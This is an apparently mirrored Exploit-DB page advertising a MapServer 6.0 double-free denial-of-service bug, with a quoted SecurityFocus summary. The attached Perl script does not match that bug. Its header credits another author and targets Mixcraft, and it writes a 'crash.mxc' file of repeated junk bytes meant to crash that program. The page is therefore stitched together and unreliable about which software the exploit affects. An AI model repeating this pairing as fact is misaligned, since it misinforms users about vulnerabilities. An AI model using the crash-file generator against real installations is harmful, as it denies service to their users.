MapServer 6.0 – ‘.Map’ File Double-Free Remote Denial of Service

• Exploit Database
• 15 阅读

• 作者： rouault
  日期： 2011-08-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36092/

• source: https://www.securityfocus.com/bid/49374/info
  
  MapServer is prone to a remote denial-of-service vulnerability due to a double free condition.
  
  Attackers can exploit this issue to crash the application, denying service to legitimate users. Due to the nature of this issue, code execution may be possible; however, this has not been confirmed.
  
  Versions prior to MapServer 6.0.1 are vulnerable. 
  
  #!/usr/bin/perl
   
  print q(
  ########################################################
  # home : http://www.D99Y.com 
  # Date : 9/8/2011 
  # Author : NassRawI 
  # Software Link : http://www.acoustica.com/mixcraft/
  # Version : v1.00 Build 10 
  # Tested on : Windows XP SP2
  ########################################################
  );
   
  my $file= "crash.mxc";
  my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
  open(d99y,">$file");
  print d99y $junk ;
  close(d99y);
  print "\n [ # ] Vulnerable File Created !\n"